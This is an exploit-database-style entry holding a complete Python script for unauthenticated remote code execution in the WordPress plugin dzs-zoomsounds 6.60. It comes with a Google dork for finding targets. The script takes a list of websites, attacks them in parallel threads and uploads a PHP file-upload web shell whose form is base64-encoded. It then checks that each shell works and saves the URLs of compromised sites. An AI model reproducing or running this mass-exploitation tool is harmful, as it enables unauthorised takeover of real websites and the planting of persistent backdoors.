<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated) # Google Dork: inurl:wp-content/plugins/dzs-zoomsounds # Date: 16/02/2022 # Exploit Author: Overthinker1877 (1877 Team) # Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/ # Version: 6.60 # Tested on: Windows / Linux import os import requests import threading from multiprocessing.dummy import Pool,Lock from bs4 import BeautifulSoup import time import smtplib,sys,ctypes from random import choice from colorama import Fore from colorama import Style from colorama import init import re import time from time import sleep init(autoreset=True) fr = Fore.RED gr = Fore.BLUE fc = Fore.CYAN fw = Fore.WHITE fy = Fore.YELLOW fg = Fore.GREEN sd = Style.DIM sn = Style.NORMAL sb = Style.BRIGHT Bad = 0 Good = 0 def Folder(directory): if not os.path.exists(directory): os.makedirs(directory) Folder("exploited") def clear(): try: if os.name == 'nt': os.system('cls') else: os.system('clear') except: pass def finder(i) : global Bad,Good head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} try : x = requests.session() listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] for script in listaa : url = (i+"/"+script) while True : req_first = x.get(url, headers=head) if "error:http raw post data does not exist" in req_first.text : burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>" requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") req_second = x.get(urlx, headers=head) if "Overthinker1877" in req_second.text : Good = Good + 1 print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) with open("exploited/shell.txt","a") as file : file.write(urlx+"\n") file.close() else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") pass break except : pass if os.name == 'nt': ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) else : sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) def key_logo(): clear = '\x1b[0m' colors = [36, 32, 34, 35, 31, 37] x = ' [ + ] OVERTHINKER1877 EXPLOIT' for N, line in enumerate(x.split('\n')): sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) time.sleep(0.05) def process(line): time.sleep(1) def run() : key_logo() clear() print(""" [-] -----------------------------------------[-] [+] WwW.1877.TeaM [-] -----------------------------------------[-] \n \n""") file_name = input("Website List : ") op = open(file_name,'r').read().splitlines() TEXTList = [list.strip() for list in op] p = Pool(int(input('Thread : '))) p.map(finder, TEXTList) run() </code></pre>